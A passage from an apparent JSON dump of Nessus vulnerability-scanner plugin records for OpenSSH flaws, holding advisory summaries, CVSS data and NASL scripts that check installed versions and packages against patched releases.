the memory manager being incorrectly\n accessible when pre-authenticating compression is\n disabled. A local attacker can exploit this to gain\n elevated privileges. (CVE-2016-10012)\n\n - A denial of service vulnerability exists in sshd when\n handling KEXINIT messages. An unauthenticated, remote\n attacker can exploit this, by sending multiple KEXINIT\n messages, to consume up to 128MB per connection.\n\n - A flaw exists in sshd due to improper validation of\n address ranges by the AllowUsers and DenyUsers\n directives at configuration load time. 
A local attacker\n can exploit this, via an invalid CIDR address range, to\n gain access to restricted areas.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssh.com/txt/release-7.4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenSSH version 7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openbsd:openssh\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/ssh\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Ensure the port is open.\nport = get_service(svc:\"ssh\", exit_on_fail:TRUE);\n\n# Get banner for service.\nbanner = get_kb_item_or_exit(\"SSH/banner/\" + port);\n\nbp_banner = tolower(get_backport_banner(banner:banner));\nif (\"openssh\" >!< bp_banner)\n audit(AUDIT_NOT_LISTEN, \"OpenSSH\", port);\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\nif (backported)\n audit(code:0, AUDIT_BACKPORT_SERVICE, port, \"OpenSSH\");\n\n# Check the version in the backported banner.\nmatch = eregmatch(string:bp_banner, pattern:\"openssh[-_]([0-9][-._0-9a-z]+)\");\nif (isnull(match))\n audit(AUDIT_SERVICE_VER_FAIL, \"OpenSSH\", port);\nversion = match[1];\n\nfix = \"7.4\";\nif (\n version =~ \"^[0-6]\\.\" ||\n version =~ \"^7\\.[0-3]\"\n )\n{\n items = make_array(\"Version source\", banner,\n \"Installed version\", version,\n \"Fixed version\", fix);\n order = make_list(\"Version source\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"OpenSSH\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:46:37", "description": "Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules\nfrom untrusted directories. A remote attacker could possibly use this\nissue to execute arbitrary PKCS#11 modules. This issue only affected\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on\nUnix-domain sockets when privilege separation is disabled. 
A local\nattacker could possibly use this issue to gain privileges. This issue\nonly affected Ubuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer\nmemory operations. A local attacker could possibly use this issue to\nobtain sensitive information. This issue only affected Ubuntu 14.04\nLTS and Ubuntu 16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain\nshared memory manager operations. A local attacker could possibly use\nthis issue to gain privileges. This issue only affected Ubuntu 14.04 LTS\nand Ubuntu 16.04 LTS. (CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write\noperations in readonly mode. A remote attacker could possibly use this\nissue to create zero-length files, leading to a denial of service.\n(CVE-2017-15906).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-23T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : openssh vulnerabilities (USN-3538-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:openssh-server", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3538-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106266", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3538-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106266);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2017-15906\");\n script_xref(name:\"USN\", value:\"3538-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : openssh vulnerabilities (USN-3538-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules\nfrom untrusted directories. A remote attacker could possibly use this\nissue to execute arbitrary PKCS#11 modules. 
This issue only affected\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on\nUnix-domain sockets when privilege separation is disabled. A local\nattacker could possibly use this issue to gain privileges. This issue\nonly affected Ubuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer\nmemory operations. A local attacker could possibly use this issue to\nobtain sensitive information. This issue only affected Ubuntu 14.04\nLTS and Ubuntu 16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain\nshared memory manager operations. A local attacker could possibly use\nissue to gain privileges. This issue only affected Ubuntu 14.04 LTS\nand Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and\nUbuntu 16.04 LTS. (CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write\noperations in readonly mode. A remote attacker could possibly use this\nissue to create zero-length files, leading to a denial of service.\n(CVE-2017-15906).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3538-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh-server package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"openssh-server\", pkgver:\"1:6.6p1-2ubuntu2.10\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"openssh-server\", pkgver:\"1:7.2p2-4ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"openssh-server\", pkgver:\"1:7.5p1-10ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-server\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T16:36:38", "description": "This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests 
(bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might have\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have been created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might have allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThese non-security issues were fixed :\n\n - Adjusted suggested command for removing conflicting\n server keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in configuration (bsc#1005893\n bsc#1021626)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-01T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2017-184)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012", "CVE-2016-8858"], "modified": "2017-02-01T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "p-cpe:/a:novell:opensuse:openssh-debuginfo", 
"p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2017-184.NASL", "href": "https://www.tenable.com/plugins/nessus/96919", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-184.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96919);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2017-184)\");\n script_summary(english:\"Check for the openSUSE-2017-184 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability 
in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThese non-security issues were fixed :\n\n - Adjusted suggested command for removing conflicting\n server keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in configuration (bsc#1005893\n bsc#1021626)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1021626\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-cavs-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debugsource-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-fips-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-debuginfo-7.2p2-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:25:21", "description": "This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might have\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have been created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might have allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-24T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012", "CVE-2016-8858"], "modified": "2017-01-24T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2017-0264-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0264-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96718);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 
value:\n\"This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10010/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10012/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170264-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bec09483\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch 
